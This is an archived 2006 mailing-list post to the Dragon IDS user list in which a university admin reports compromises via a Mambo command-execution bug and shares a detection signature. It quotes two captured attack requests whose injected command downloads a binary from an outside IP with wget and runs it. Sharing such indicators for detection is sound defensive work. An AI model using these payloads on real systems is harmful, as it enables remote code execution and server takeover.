'[Dragonidsuser] mambo attacks/probes'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       dragonidsuser
Subject:    [Dragonidsuser] mambo attacks/probes
From:       Mike Iglesias <iglesias () draco ! acs ! uci ! edu>
Date:       2006-03-08 19:21:22
Message-ID: 200603081921.k28JLMgo014051 () draco ! acs ! uci ! edu
[Download RAW message or body]

We had a system or two compromised via the Mambo "Function.php arbitrary
command execution" bug, so we have setup a signature to catch the 
probes/attacks when they happen.

Here are a couple of example attacks:

GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mos \
Config_absolute_path=http://204.83.56.144/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicupo;echo%20YYY;echo| \
HTTP/1.1{A}

GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConf \
ig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| \
HTTP/1.1{A}

Here's the signature we are using to catch these:

T D A S 10 200 W UCI:MAMBO-ATTACK /2fmambo/2f , wget

If you have a better way to catch these, please let me know.


Mike Iglesias                          Email:       iglesias@uci.edu
University of California, Irvine       phone:       949-824-6926
Network & Academic Computing Services  FAX:         949-824-2069
_______________________________________________
Dragonidsuser mailing list

For help please follow the below instructions.
You can make subsciption adjustments via email by sending a message to:

  Dragonidsuser-request@enterasys.com

with the word `help' in the subject or body (don't include the quotes), and you will \
get back a message with instructions.

You must know your password to change your options (including changing the password, \
itself) or to unsubscribe.   If you forget your password, don't worry, you will \
receive a monthly reminder telling you what all your enterasys.com mailing list \
passwords are, and how to unsubscribe or change your options.  


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic